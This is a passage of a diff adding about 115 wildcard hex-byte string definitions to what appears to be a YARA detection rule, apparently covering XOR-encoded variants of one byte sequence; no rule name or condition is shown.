+		$s125 = { 7D 7C 7D 7C 7D 7F ?? ?? 7D 7F 7D 7C 7D 7F ?? ?? 7D 7E 7D 7F 7D 79 ?? ?? ?? ?? 7D 79 7D 7F 7D 79 ?? ?? ?? ?? 7D 78 7D 7C 7D 7F ?? ?? }
+		$s126 = { 7E 7F 7E 7F 7E 7C ?? ?? 7E 7C 7E 7F 7E 7C ?? ?? 7E 7D 7E 7C 7E 7A ?? ?? ?? ?? 7E 7A 7E 7C 7E 7A ?? ?? ?? ?? 7E 7B 7E 7F 7E 7C ?? ?? }
+		$s127 = { 7F 7E 7F 7E 7F 7D ?? ?? 7F 7D 7F 7E 7F 7D ?? ?? 7F 7C 7F 7D 7F 7B ?? ?? ?? ?? 7F 7B 7F 7D 7F 7B ?? ?? ?? ?? 7F 7A 7F 7E 7F 7D ?? ?? }
+		$s128 = { 80 81 80 81 80 82 ?? ?? 80 82 80 81 80 82 ?? ?? 80 83 80 82 80 84 ?? ?? ?? ?? 80 84 80 82 80 84 ?? ?? ?? ?? 80 85 80 81 80 82 ?? ?? }
+		$s129 = { 81 80 81 80 81 83 ?? ?? 81 83 81 80 81 83 ?? ?? 81 82 81 83 81 85 ?? ?? ?? ?? 81 85 81 83 81 85 ?? ?? ?? ?? 81 84 81 80 81 83 ?? ?? }
+		$s130 = { 82 83 82 83 82 80 ?? ?? 82 80 82 83 82 80 ?? ?? 82 81 82 80 82 86 ?? ?? ?? ?? 82 86 82 80 82 86 ?? ?? ?? ?? 82 87 82 83 82 80 ?? ?? }
+		$s131 = { 83 82 83 82 83 81 ?? ?? 83 81 83 82 83 81 ?? ?? 83 80 83 81 83 87 ?? ?? ?? ?? 83 87 83 81 83 87 ?? ?? ?? ?? 83 86 83 82 83 81 ?? ?? }
+		$s132 = { 84 85 84 85 84 86 ?? ?? 84 86 84 85 84 86 ?? ?? 84 87 84 86 84 80 ?? ?? ?? ?? 84 80 84 86 84 80 ?? ?? ?? ?? 84 81 84 85 84 86 ?? ?? }
+		$s133 = { 85 84 85 84 85 87 ?? ?? 85 87 85 84 85 87 ?? ?? 85 86 85 87 85 81 ?? ?? ?? ?? 85 81 85 87 85 81 ?? ?? ?? ?? 85 80 85 84 85 87 ?? ?? }
+		$s134 = { 86 87 86 87 86 84 ?? ?? 86 84 86 87 86 84 ?? ?? 86 85 86 84 86 82 ?? ?? ?? ?? 86 82 86 84 86 82 ?? ?? ?? ?? 86 83 86 87 86 84 ?? ?? }
+		$s135 = { 87 86 87 86 87 85 ?? ?? 87 85 87 86 87 85 ?? ?? 87 84 87 85 87 83 ?? ?? ?? ?? 87 83 87 85 87 83 ?? ?? ?? ?? 87 82 87 86 87 85 ?? ?? }
+		$s136 = { 88 89 88 89 88 8A ?? ?? 88 8A 88 89 88 8A ?? ?? 88 8B 88 8A 88 8C ?? ?? ?? ?? 88 8C 88 8A 88 8C ?? ?? ?? ?? 88 8D 88 89 88 8A ?? ?? }
+		$s137 = { 89 88 89 88 89 8B ?? ?? 89 8B 89 88 89 8B ?? ?? 89 8A 89 8B 89 8D ?? ?? ?? ?? 89 8D 89 8B 89 8D ?? ?? ?? ?? 89 8C 89 88 89 8B ?? ?? }
+		$s138 = { 8A 8B 8A 8B 8A 88 ?? ?? 8A 88 8A 8B 8A 88 ?? ?? 8A 89 8A 88 8A 8E ?? ?? ?? ?? 8A 8E 8A 88 8A 8E ?? ?? ?? ?? 8A 8F 8A 8B 8A 88 ?? ?? }
+		$s139 = { 8B 8A 8B 8A 8B 89 ?? ?? 8B 89 8B 8A 8B 89 ?? ?? 8B 88 8B 89 8B 8F ?? ?? ?? ?? 8B 8F 8B 89 8B 8F ?? ?? ?? ?? 8B 8E 8B 8A 8B 89 ?? ?? }
+		$s140 = { 8C 8D 8C 8D 8C 8E ?? ?? 8C 8E 8C 8D 8C 8E ?? ?? 8C 8F 8C 8E 8C 88 ?? ?? ?? ?? 8C 88 8C 8E 8C 88 ?? ?? ?? ?? 8C 89 8C 8D 8C 8E ?? ?? }
+		$s141 = { 8D 8C 8D 8C 8D 8F ?? ?? 8D 8F 8D 8C 8D 8F ?? ?? 8D 8E 8D 8F 8D 89 ?? ?? ?? ?? 8D 89 8D 8F 8D 89 ?? ?? ?? ?? 8D 88 8D 8C 8D 8F ?? ?? }
+		$s142 = { 8E 8F 8E 8F 8E 8C ?? ?? 8E 8C 8E 8F 8E 8C ?? ?? 8E 8D 8E 8C 8E 8A ?? ?? ?? ?? 8E 8A 8E 8C 8E 8A ?? ?? ?? ?? 8E 8B 8E 8F 8E 8C ?? ?? }
+		$s143 = { 8F 8E 8F 8E 8F 8D ?? ?? 8F 8D 8F 8E 8F 8D ?? ?? 8F 8C 8F 8D 8F 8B ?? ?? ?? ?? 8F 8B 8F 8D 8F 8B ?? ?? ?? ?? 8F 8A 8F 8E 8F 8D ?? ?? }
+		$s144 = { 90 91 90 91 90 92 ?? ?? 90 92 90 91 90 92 ?? ?? 90 93 90 92 90 94 ?? ?? ?? ?? 90 94 90 92 90 94 ?? ?? ?? ?? 90 95 90 91 90 92 ?? ?? }
+		$s145 = { 91 90 91 90 91 93 ?? ?? 91 93 91 90 91 93 ?? ?? 91 92 91 93 91 95 ?? ?? ?? ?? 91 95 91 93 91 95 ?? ?? ?? ?? 91 94 91 90 91 93 ?? ?? }
+		$s146 = { 92 93 92 93 92 90 ?? ?? 92 90 92 93 92 90 ?? ?? 92 91 92 90 92 96 ?? ?? ?? ?? 92 96 92 90 92 96 ?? ?? ?? ?? 92 97 92 93 92 90 ?? ?? }
+		$s147 = { 93 92 93 92 93 91 ?? ?? 93 91 93 92 93 91 ?? ?? 93 90 93 91 93 97 ?? ?? ?? ?? 93 97 93 91 93 97 ?? ?? ?? ?? 93 96 93 92 93 91 ?? ?? }
+		$s148 = { 94 95 94 95 94 96 ?? ?? 94 96 94 95 94 96 ?? ?? 94 97 94 96 94 90 ?? ?? ?? ?? 94 90 94 96 94 90 ?? ?? ?? ?? 94 91 94 95 94 96 ?? ?? }
+		$s149 = { 95 94 95 94 95 97 ?? ?? 95 97 95 94 95 97 ?? ?? 95 96 95 97 95 91 ?? ?? ?? ?? 95 91 95 97 95 91 ?? ?? ?? ?? 95 90 95 94 95 97 ?? ?? }
+		$s150 = { 96 97 96 97 96 94 ?? ?? 96 94 96 97 96 94 ?? ?? 96 95 96 94 96 92 ?? ?? ?? ?? 96 92 96 94 96 92 ?? ?? ?? ?? 96 93 96 97 96 94 ?? ?? }
+		$s151 = { 97 96 97 96 97 95 ?? ?? 97 95 97 96 97 95 ?? ?? 97 94 97 95 97 93 ?? ?? ?? ?? 97 93 97 95 97 93 ?? ?? ?? ?? 97 92 97 96 97 95 ?? ?? }
+		$s152 = { 98 99 98 99 98 9A ?? ?? 98 9A 98 99 98 9A ?? ?? 98 9B 98 9A 98 9C ?? ?? ?? ?? 98 9C 98 9A 98 9C ?? ?? ?? ?? 98 9D 98 99 98 9A ?? ?? }
+		$s153 = { 99 98 99 98 99 9B ?? ?? 99 9B 99 98 99 9B ?? ?? 99 9A 99 9B 99 9D ?? ?? ?? ?? 99 9D 99 9B 99 9D ?? ?? ?? ?? 99 9C 99 98 99 9B ?? ?? }
+		$s154 = { 9A 9B 9A 9B 9A 98 ?? ?? 9A 98 9A 9B 9A 98 ?? ?? 9A 99 9A 98 9A 9E ?? ?? ?? ?? 9A 9E 9A 98 9A 9E ?? ?? ?? ?? 9A 9F 9A 9B 9A 98 ?? ?? }
+		$s155 = { 9B 9A 9B 9A 9B 99 ?? ?? 9B 99 9B 9A 9B 99 ?? ?? 9B 98 9B 99 9B 9F ?? ?? ?? ?? 9B 9F 9B 99 9B 9F ?? ?? ?? ?? 9B 9E 9B 9A 9B 99 ?? ?? }
+		$s156 = { 9C 9D 9C 9D 9C 9E ?? ?? 9C 9E 9C 9D 9C 9E ?? ?? 9C 9F 9C 9E 9C 98 ?? ?? ?? ?? 9C 98 9C 9E 9C 98 ?? ?? ?? ?? 9C 99 9C 9D 9C 9E ?? ?? }
+		$s157 = { 9D 9C 9D 9C 9D 9F ?? ?? 9D 9F 9D 9C 9D 9F ?? ?? 9D 9E 9D 9F 9D 99 ?? ?? ?? ?? 9D 99 9D 9F 9D 99 ?? ?? ?? ?? 9D 98 9D 9C 9D 9F ?? ?? }
+		$s158 = { 9E 9F 9E 9F 9E 9C ?? ?? 9E 9C 9E 9F 9E 9C ?? ?? 9E 9D 9E 9C 9E 9A ?? ?? ?? ?? 9E 9A 9E 9C 9E 9A ?? ?? ?? ?? 9E 9B 9E 9F 9E 9C ?? ?? }
+		$s159 = { 9F 9E 9F 9E 9F 9D ?? ?? 9F 9D 9F 9E 9F 9D ?? ?? 9F 9C 9F 9D 9F 9B ?? ?? ?? ?? 9F 9B 9F 9D 9F 9B ?? ?? ?? ?? 9F 9A 9F 9E 9F 9D ?? ?? }
+		$s160 = { A0 A1 A0 A1 A0 A2 ?? ?? A0 A2 A0 A1 A0 A2 ?? ?? A0 A3 A0 A2 A0 A4 ?? ?? ?? ?? A0 A4 A0 A2 A0 A4 ?? ?? ?? ?? A0 A5 A0 A1 A0 A2 ?? ?? }
+		$s161 = { A1 A0 A1 A0 A1 A3 ?? ?? A1 A3 A1 A0 A1 A3 ?? ?? A1 A2 A1 A3 A1 A5 ?? ?? ?? ?? A1 A5 A1 A3 A1 A5 ?? ?? ?? ?? A1 A4 A1 A0 A1 A3 ?? ?? }
+		$s162 = { A2 A3 A2 A3 A2 A0 ?? ?? A2 A0 A2 A3 A2 A0 ?? ?? A2 A1 A2 A0 A2 A6 ?? ?? ?? ?? A2 A6 A2 A0 A2 A6 ?? ?? ?? ?? A2 A7 A2 A3 A2 A0 ?? ?? }
+		$s163 = { A3 A2 A3 A2 A3 A1 ?? ?? A3 A1 A3 A2 A3 A1 ?? ?? A3 A0 A3 A1 A3 A7 ?? ?? ?? ?? A3 A7 A3 A1 A3 A7 ?? ?? ?? ?? A3 A6 A3 A2 A3 A1 ?? ?? }
+		$s164 = { A4 A5 A4 A5 A4 A6 ?? ?? A4 A6 A4 A5 A4 A6 ?? ?? A4 A7 A4 A6 A4 A0 ?? ?? ?? ?? A4 A0 A4 A6 A4 A0 ?? ?? ?? ?? A4 A1 A4 A5 A4 A6 ?? ?? }
+		$s165 = { A5 A4 A5 A4 A5 A7 ?? ?? A5 A7 A5 A4 A5 A7 ?? ?? A5 A6 A5 A7 A5 A1 ?? ?? ?? ?? A5 A1 A5 A7 A5 A1 ?? ?? ?? ?? A5 A0 A5 A4 A5 A7 ?? ?? }
+		$s166 = { A6 A7 A6 A7 A6 A4 ?? ?? A6 A4 A6 A7 A6 A4 ?? ?? A6 A5 A6 A4 A6 A2 ?? ?? ?? ?? A6 A2 A6 A4 A6 A2 ?? ?? ?? ?? A6 A3 A6 A7 A6 A4 ?? ?? }
+		$s167 = { A7 A6 A7 A6 A7 A5 ?? ?? A7 A5 A7 A6 A7 A5 ?? ?? A7 A4 A7 A5 A7 A3 ?? ?? ?? ?? A7 A3 A7 A5 A7 A3 ?? ?? ?? ?? A7 A2 A7 A6 A7 A5 ?? ?? }
+		$s168 = { A8 A9 A8 A9 A8 AA ?? ?? A8 AA A8 A9 A8 AA ?? ?? A8 AB A8 AA A8 AC ?? ?? ?? ?? A8 AC A8 AA A8 AC ?? ?? ?? ?? A8 AD A8 A9 A8 AA ?? ?? }
+		$s169 = { A9 A8 A9 A8 A9 AB ?? ?? A9 AB A9 A8 A9 AB ?? ?? A9 AA A9 AB A9 AD ?? ?? ?? ?? A9 AD A9 AB A9 AD ?? ?? ?? ?? A9 AC A9 A8 A9 AB ?? ?? }
+		$s170 = { AA AB AA AB AA A8 ?? ?? AA A8 AA AB AA A8 ?? ?? AA A9 AA A8 AA AE ?? ?? ?? ?? AA AE AA A8 AA AE ?? ?? ?? ?? AA AF AA AB AA A8 ?? ?? }
+		$s171 = { AB AA AB AA AB A9 ?? ?? AB A9 AB AA AB A9 ?? ?? AB A8 AB A9 AB AF ?? ?? ?? ?? AB AF AB A9 AB AF ?? ?? ?? ?? AB AE AB AA AB A9 ?? ?? }
+		$s172 = { AC AD AC AD AC AE ?? ?? AC AE AC AD AC AE ?? ?? AC AF AC AE AC A8 ?? ?? ?? ?? AC A8 AC AE AC A8 ?? ?? ?? ?? AC A9 AC AD AC AE ?? ?? }
+		$s173 = { AD AC AD AC AD AF ?? ?? AD AF AD AC AD AF ?? ?? AD AE AD AF AD A9 ?? ?? ?? ?? AD A9 AD AF AD A9 ?? ?? ?? ?? AD A8 AD AC AD AF ?? ?? }
+		$s174 = { AE AF AE AF AE AC ?? ?? AE AC AE AF AE AC ?? ?? AE AD AE AC AE AA ?? ?? ?? ?? AE AA AE AC AE AA ?? ?? ?? ?? AE AB AE AF AE AC ?? ?? }
+		$s175 = { AF AE AF AE AF AD ?? ?? AF AD AF AE AF AD ?? ?? AF AC AF AD AF AB ?? ?? ?? ?? AF AB AF AD AF AB ?? ?? ?? ?? AF AA AF AE AF AD ?? ?? }
+		$s176 = { B0 B1 B0 B1 B0 B2 ?? ?? B0 B2 B0 B1 B0 B2 ?? ?? B0 B3 B0 B2 B0 B4 ?? ?? ?? ?? B0 B4 B0 B2 B0 B4 ?? ?? ?? ?? B0 B5 B0 B1 B0 B2 ?? ?? }
+		$s177 = { B1 B0 B1 B0 B1 B3 ?? ?? B1 B3 B1 B0 B1 B3 ?? ?? B1 B2 B1 B3 B1 B5 ?? ?? ?? ?? B1 B5 B1 B3 B1 B5 ?? ?? ?? ?? B1 B4 B1 B0 B1 B3 ?? ?? }
+		$s178 = { B2 B3 B2 B3 B2 B0 ?? ?? B2 B0 B2 B3 B2 B0 ?? ?? B2 B1 B2 B0 B2 B6 ?? ?? ?? ?? B2 B6 B2 B0 B2 B6 ?? ?? ?? ?? B2 B7 B2 B3 B2 B0 ?? ?? }
+		$s179 = { B3 B2 B3 B2 B3 B1 ?? ?? B3 B1 B3 B2 B3 B1 ?? ?? B3 B0 B3 B1 B3 B7 ?? ?? ?? ?? B3 B7 B3 B1 B3 B7 ?? ?? ?? ?? B3 B6 B3 B2 B3 B1 ?? ?? }
+		$s180 = { B4 B5 B4 B5 B4 B6 ?? ?? B4 B6 B4 B5 B4 B6 ?? ?? B4 B7 B4 B6 B4 B0 ?? ?? ?? ?? B4 B0 B4 B6 B4 B0 ?? ?? ?? ?? B4 B1 B4 B5 B4 B6 ?? ?? }
+		$s181 = { B5 B4 B5 B4 B5 B7 ?? ?? B5 B7 B5 B4 B5 B7 ?? ?? B5 B6 B5 B7 B5 B1 ?? ?? ?? ?? B5 B1 B5 B7 B5 B1 ?? ?? ?? ?? B5 B0 B5 B4 B5 B7 ?? ?? }
+		$s182 = { B6 B7 B6 B7 B6 B4 ?? ?? B6 B4 B6 B7 B6 B4 ?? ?? B6 B5 B6 B4 B6 B2 ?? ?? ?? ?? B6 B2 B6 B4 B6 B2 ?? ?? ?? ?? B6 B3 B6 B7 B6 B4 ?? ?? }
+		$s183 = { B7 B6 B7 B6 B7 B5 ?? ?? B7 B5 B7 B6 B7 B5 ?? ?? B7 B4 B7 B5 B7 B3 ?? ?? ?? ?? B7 B3 B7 B5 B7 B3 ?? ?? ?? ?? B7 B2 B7 B6 B7 B5 ?? ?? }
+		$s184 = { B8 B9 B8 B9 B8 BA ?? ?? B8 BA B8 B9 B8 BA ?? ?? B8 BB B8 BA B8 BC ?? ?? ?? ?? B8 BC B8 BA B8 BC ?? ?? ?? ?? B8 BD B8 B9 B8 BA ?? ?? }
+		$s185 = { B9 B8 B9 B8 B9 BB ?? ?? B9 BB B9 B8 B9 BB ?? ?? B9 BA B9 BB B9 BD ?? ?? ?? ?? B9 BD B9 BB B9 BD ?? ?? ?? ?? B9 BC B9 B8 B9 BB ?? ?? }
+		$s186 = { BA BB BA BB BA B8 ?? ?? BA B8 BA BB BA B8 ?? ?? BA B9 BA B8 BA BE ?? ?? ?? ?? BA BE BA B8 BA BE ?? ?? ?? ?? BA BF BA BB BA B8 ?? ?? }
+		$s187 = { BB BA BB BA BB B9 ?? ?? BB B9 BB BA BB B9 ?? ?? BB B8 BB B9 BB BF ?? ?? ?? ?? BB BF BB B9 BB BF ?? ?? ?? ?? BB BE BB BA BB B9 ?? ?? }
+		$s188 = { BC BD BC BD BC BE ?? ?? BC BE BC BD BC BE ?? ?? BC BF BC BE BC B8 ?? ?? ?? ?? BC B8 BC BE BC B8 ?? ?? ?? ?? BC B9 BC BD BC BE ?? ?? }
+		$s189 = { BD BC BD BC BD BF ?? ?? BD BF BD BC BD BF ?? ?? BD BE BD BF BD B9 ?? ?? ?? ?? BD B9 BD BF BD B9 ?? ?? ?? ?? BD B8 BD BC BD BF ?? ?? }
+		$s190 = { BE BF BE BF BE BC ?? ?? BE BC BE BF BE BC ?? ?? BE BD BE BC BE BA ?? ?? ?? ?? BE BA BE BC BE BA ?? ?? ?? ?? BE BB BE BF BE BC ?? ?? }
+		$s191 = { BF BE BF BE BF BD ?? ?? BF BD BF BE BF BD ?? ?? BF BC BF BD BF BB ?? ?? ?? ?? BF BB BF BD BF BB ?? ?? ?? ?? BF BA BF BE BF BD ?? ?? }
+		$s192 = { C0 C1 C0 C1 C0 C2 ?? ?? C0 C2 C0 C1 C0 C2 ?? ?? C0 C3 C0 C2 C0 C4 ?? ?? ?? ?? C0 C4 C0 C2 C0 C4 ?? ?? ?? ?? C0 C5 C0 C1 C0 C2 ?? ?? }
+		$s193 = { C1 C0 C1 C0 C1 C3 ?? ?? C1 C3 C1 C0 C1 C3 ?? ?? C1 C2 C1 C3 C1 C5 ?? ?? ?? ?? C1 C5 C1 C3 C1 C5 ?? ?? ?? ?? C1 C4 C1 C0 C1 C3 ?? ?? }
+		$s194 = { C2 C3 C2 C3 C2 C0 ?? ?? C2 C0 C2 C3 C2 C0 ?? ?? C2 C1 C2 C0 C2 C6 ?? ?? ?? ?? C2 C6 C2 C0 C2 C6 ?? ?? ?? ?? C2 C7 C2 C3 C2 C0 ?? ?? }
+		$s195 = { C3 C2 C3 C2 C3 C1 ?? ?? C3 C1 C3 C2 C3 C1 ?? ?? C3 C0 C3 C1 C3 C7 ?? ?? ?? ?? C3 C7 C3 C1 C3 C7 ?? ?? ?? ?? C3 C6 C3 C2 C3 C1 ?? ?? }
+		$s196 = { C4 C5 C4 C5 C4 C6 ?? ?? C4 C6 C4 C5 C4 C6 ?? ?? C4 C7 C4 C6 C4 C0 ?? ?? ?? ?? C4 C0 C4 C6 C4 C0 ?? ?? ?? ?? C4 C1 C4 C5 C4 C6 ?? ?? }
+		$s197 = { C5 C4 C5 C4 C5 C7 ?? ?? C5 C7 C5 C4 C5 C7 ?? ?? C5 C6 C5 C7 C5 C1 ?? ?? ?? ?? C5 C1 C5 C7 C5 C1 ?? ?? ?? ?? C5 C0 C5 C4 C5 C7 ?? ?? }
+		$s198 = { C6 C7 C6 C7 C6 C4 ?? ?? C6 C4 C6 C7 C6 C4 ?? ?? C6 C5 C6 C4 C6 C2 ?? ?? ?? ?? C6 C2 C6 C4 C6 C2 ?? ?? ?? ?? C6 C3 C6 C7 C6 C4 ?? ?? }
+		$s199 = { C7 C6 C7 C6 C7 C5 ?? ?? C7 C5 C7 C6 C7 C5 ?? ?? C7 C4 C7 C5 C7 C3 ?? ?? ?? ?? C7 C3 C7 C5 C7 C3 ?? ?? ?? ?? C7 C2 C7 C6 C7 C5 ?? ?? }
+		$s200 = { C8 C9 C8 C9 C8 CA ?? ?? C8 CA C8 C9 C8 CA ?? ?? C8 CB C8 CA C8 CC ?? ?? ?? ?? C8 CC C8 CA C8 CC ?? ?? ?? ?? C8 CD C8 C9 C8 CA ?? ?? }
+		$s201 = { C9 C8 C9 C8 C9 CB ?? ?? C9 CB C9 C8 C9 CB ?? ?? C9 CA C9 CB C9 CD ?? ?? ?? ?? C9 CD C9 CB C9 CD ?? ?? ?? ?? C9 CC C9 C8 C9 CB ?? ?? }
+		$s202 = { CA CB CA CB CA C8 ?? ?? CA C8 CA CB CA C8 ?? ?? CA C9 CA C8 CA CE ?? ?? ?? ?? CA CE CA C8 CA CE ?? ?? ?? ?? CA CF CA CB CA C8 ?? ?? }
+		$s203 = { CB CA CB CA CB C9 ?? ?? CB C9 CB CA CB C9 ?? ?? CB C8 CB C9 CB CF ?? ?? ?? ?? CB CF CB C9 CB CF ?? ?? ?? ?? CB CE CB CA CB C9 ?? ?? }
+		$s204 = { CC CD CC CD CC CE ?? ?? CC CE CC CD CC CE ?? ?? CC CF CC CE CC C8 ?? ?? ?? ?? CC C8 CC CE CC C8 ?? ?? ?? ?? CC C9 CC CD CC CE ?? ?? }
+		$s205 = { CD CC CD CC CD CF ?? ?? CD CF CD CC CD CF ?? ?? CD CE CD CF CD C9 ?? ?? ?? ?? CD C9 CD CF CD C9 ?? ?? ?? ?? CD C8 CD CC CD CF ?? ?? }
+		$s206 = { CE CF CE CF CE CC ?? ?? CE CC CE CF CE CC ?? ?? CE CD CE CC CE CA ?? ?? ?? ?? CE CA CE CC CE CA ?? ?? ?? ?? CE CB CE CF CE CC ?? ?? }
+		$s207 = { CF CE CF CE CF CD ?? ?? CF CD CF CE CF CD ?? ?? CF CC CF CD CF CB ?? ?? ?? ?? CF CB CF CD CF CB ?? ?? ?? ?? CF CA CF CE CF CD ?? ?? }
+		$s208 = { D0 D1 D0 D1 D0 D2 ?? ?? D0 D2 D0 D1 D0 D2 ?? ?? D0 D3 D0 D2 D0 D4 ?? ?? ?? ?? D0 D4 D0 D2 D0 D4 ?? ?? ?? ?? D0 D5 D0 D1 D0 D2 ?? ?? }
+		$s209 = { D1 D0 D1 D0 D1 D3 ?? ?? D1 D3 D1 D0 D1 D3 ?? ?? D1 D2 D1 D3 D1 D5 ?? ?? ?? ?? D1 D5 D1 D3 D1 D5 ?? ?? ?? ?? D1 D4 D1 D0 D1 D3 ?? ?? }
+		$s210 = { D2 D3 D2 D3 D2 D0 ?? ?? D2 D0 D2 D3 D2 D0 ?? ?? D2 D1 D2 D0 D2 D6 ?? ?? ?? ?? D2 D6 D2 D0 D2 D6 ?? ?? ?? ?? D2 D7 D2 D3 D2 D0 ?? ?? }
+		$s211 = { D3 D2 D3 D2 D3 D1 ?? ?? D3 D1 D3 D2 D3 D1 ?? ?? D3 D0 D3 D1 D3 D7 ?? ?? ?? ?? D3 D7 D3 D1 D3 D7 ?? ?? ?? ?? D3 D6 D3 D2 D3 D1 ?? ?? }
+		$s212 = { D4 D5 D4 D5 D4 D6 ?? ?? D4 D6 D4 D5 D4 D6 ?? ?? D4 D7 D4 D6 D4 D0 ?? ?? ?? ?? D4 D0 D4 D6 D4 D0 ?? ?? ?? ?? D4 D1 D4 D5 D4 D6 ?? ?? }
+		$s213 = { D5 D4 D5 D4 D5 D7 ?? ?? D5 D7 D5 D4 D5 D7 ?? ?? D5 D6 D5 D7 D5 D1 ?? ?? ?? ?? D5 D1 D5 D7 D5 D1 ?? ?? ?? ?? D5 D0 D5 D4 D5 D7 ?? ?? }
+		$s214 = { D6 D7 D6 D7 D6 D4 ?? ?? D6 D4 D6 D7 D6 D4 ?? ?? D6 D5 D6 D4 D6 D2 ?? ?? ?? ?? D6 D2 D6 D4 D6 D2 ?? ?? ?? ?? D6 D3 D6 D7 D6 D4 ?? ?? }
+		$s215 = { D7 D6 D7 D6 D7 D5 ?? ?? D7 D5 D7 D6 D7 D5 ?? ?? D7 D4 D7 D5 D7 D3 ?? ?? ?? ?? D7 D3 D7 D5 D7 D3 ?? ?? ?? ?? D7 D2 D7 D6 D7 D5 ?? ?? }
+		$s216 = { D8 D9 D8 D9 D8 DA ?? ?? D8 DA D8 D9 D8 DA ?? ?? D8 DB D8 DA D8 DC ?? ?? ?? ?? D8 DC D8 DA D8 DC ?? ?? ?? ?? D8 DD D8 D9 D8 DA ?? ?? }
+		$s217 = { D9 D8 D9 D8 D9 DB ?? ?? D9 DB D9 D8 D9 DB ?? ?? D9 DA D9 DB D9 DD ?? ?? ?? ?? D9 DD D9 DB D9 DD ?? ?? ?? ?? D9 DC D9 D8 D9 DB ?? ?? }
+		$s218 = { DA DB DA DB DA D8 ?? ?? DA D8 DA DB DA D8 ?? ?? DA D9 DA D8 DA DE ?? ?? ?? ?? DA DE DA D8 DA DE ?? ?? ?? ?? DA DF DA DB DA D8 ?? ?? }
+		$s219 = { DB DA DB DA DB D9 ?? ?? DB D9 DB DA DB D9 ?? ?? DB D8 DB D9 DB DF ?? ?? ?? ?? DB DF DB D9 DB DF ?? ?? ?? ?? DB DE DB DA DB D9 ?? ?? }
+		$s220 = { DC DD DC DD DC DE ?? ?? DC DE DC DD DC DE ?? ?? DC DF DC DE DC D8 ?? ?? ?? ?? DC D8 DC DE DC D8 ?? ?? ?? ?? DC D9 DC DD DC DE ?? ?? }
+		$s221 = { DD DC DD DC DD DF ?? ?? DD DF DD DC DD DF ?? ?? DD DE DD DF DD D9 ?? ?? ?? ?? DD D9 DD DF DD D9 ?? ?? ?? ?? DD D8 DD DC DD DF ?? ?? }
+		$s222 = { DE DF DE DF DE DC ?? ?? DE DC DE DF DE DC ?? ?? DE DD DE DC DE DA ?? ?? ?? ?? DE DA DE DC DE DA ?? ?? ?? ?? DE DB DE DF DE DC ?? ?? }
+		$s223 = { DF DE DF DE DF DD ?? ?? DF DD DF DE DF DD ?? ?? DF DC DF DD DF DB ?? ?? ?? ?? DF DB DF DD DF DB ?? ?? ?? ?? DF DA DF DE DF DD ?? ?? }
+		$s224 = { E0 E1 E0 E1 E0 E2 ?? ?? E0 E2 E0 E1 E0 E2 ?? ?? E0 E3 E0 E2 E0 E4 ?? ?? ?? ?? E0 E4 E0 E2 E0 E4 ?? ?? ?? ?? E0 E5 E0 E1 E0 E2 ?? ?? }
+		$s225 = { E1 E0 E1 E0 E1 E3 ?? ?? E1 E3 E1 E0 E1 E3 ?? ?? E1 E2 E1 E3 E1 E5 ?? ?? ?? ?? E1 E5 E1 E3 E1 E5 ?? ?? ?? ?? E1 E4 E1 E0 E1 E3 ?? ?? }
+		$s226 = { E2 E3 E2 E3 E2 E0 ?? ?? E2 E0 E2 E3 E2 E0 ?? ?? E2 E1 E2 E0 E2 E6 ?? ?? ?? ?? E2 E6 E2 E0 E2 E6 ?? ?? ?? ?? E2 E7 E2 E3 E2 E0 ?? ?? }
+		$s227 = { E3 E2 E3 E2 E3 E1 ?? ?? E3 E1 E3 E2 E3 E1 ?? ?? E3 E0 E3 E1 E3 E7 ?? ?? ?? ?? E3 E7 E3 E1 E3 E7 ?? ?? ?? ?? E3 E6 E3 E2 E3 E1 ?? ?? }
+		$s228 = { E4 E5 E4 E5 E4 E6 ?? ?? E4 E6 E4 E5 E4 E6 ?? ?? E4 E7 E4 E6 E4 E0 ?? ?? ?? ?? E4 E0 E4 E6 E4 E0 ?? ?? ?? ?? E4 E1 E4 E5 E4 E6 ?? ?? }
+		$s229 = { E5 E4 E5 E4 E5 E7 ?? ?? E5 E7 E5 E4 E5 E7 ?? ?? E5 E6 E5 E7 E5 E1 ?? ?? ?? ?? E5 E1 E5 E7 E5 E1 ?? ?? ?? ?? E5 E0 E5 E4 E5 E7 ?? ?? }
+		$s230 = { E6 E7 E6 E7 E6 E4 ?? ?? E6 E4 E6 E7 E6 E4 ?? ?? E6 E5 E6 E4 E6 E2 ?? ?? ?? ?? E6 E2 E6 E4 E6 E2 ?? ?? ?? ?? E6 E3 E6 E7 E6 E4 ?? ?? }
+		$s231 = { E7 E6 E7 E6 E7 E5 ?? ?? E7 E5 E7 E6 E7 E5 ?? ?? E7 E4 E7 E5 E7 E3 ?? ?? ?? ?? E7 E3 E7 E5 E7 E3 ?? ?? ?? ?? E7 E2 E7 E6 E7 E5 ?? ?? }
+		$s232 = { E8 E9 E8 E9 E8 EA ?? ?? E8 EA E8 E9 E8 EA ?? ?? E8 EB E8 EA E8 EC ?? ?? ?? ?? E8 EC E8 EA E8 EC ?? ?? ?? ?? E8 ED E8 E9 E8 EA ?? ?? }
+		$s233 = { E9 E8 E9 E8 E9 EB ?? ?? E9 EB E9 E8 E9 EB ?? ?? E9 EA E9 EB E9 ED ?? ?? ?? ?? E9 ED E9 EB E9 ED ?? ?? ?? ?? E9 EC E9 E8 E9 EB ?? ?? }
+		$s234 = { EA EB EA EB EA E8 ?? ?? EA E8 EA EB EA E8 ?? ?? EA E9 EA E8 EA EE ?? ?? ?? ?? EA EE EA E8 EA EE ?? ?? ?? ?? EA EF EA EB EA E8 ?? ?? }
+		$s235 = { EB EA EB EA EB E9 ?? ?? EB E9 EB EA EB E9 ?? ?? EB E8 EB E9 EB EF ?? ?? ?? ?? EB EF EB E9 EB EF ?? ?? ?? ?? EB EE EB EA EB E9 ?? ?? }
+		$s236 = { EC ED EC ED EC EE ?? ?? EC EE EC ED EC EE ?? ?? EC EF EC EE EC E8 ?? ?? ?? ?? EC E8 EC EE EC E8 ?? ?? ?? ?? EC E9 EC ED EC EE ?? ?? }
+		$s237 = { ED EC ED EC ED EF ?? ?? ED EF ED EC ED EF ?? ?? ED EE ED EF ED E9 ?? ?? ?? ?? ED E9 ED EF ED E9 ?? ?? ?? ?? ED E8 ED EC ED EF ?? ?? }
+		$s238 = { EE EF EE EF EE EC ?? ?? EE EC EE EF EE EC ?? ?? EE ED EE EC EE EA ?? ?? ?? ?? EE EA EE EC EE EA ?? ?? ?? ?? EE EB EE EF EE EC ?? ?? }
+		$s239 = { EF EE EF EE EF ED ?? ?? EF ED EF EE EF ED ?? ?? EF EC EF ED EF EB ?? ?? ?? ?? EF EB EF ED EF EB ?? ?? ?? ?? EF EA EF EE EF ED ?? ?? }
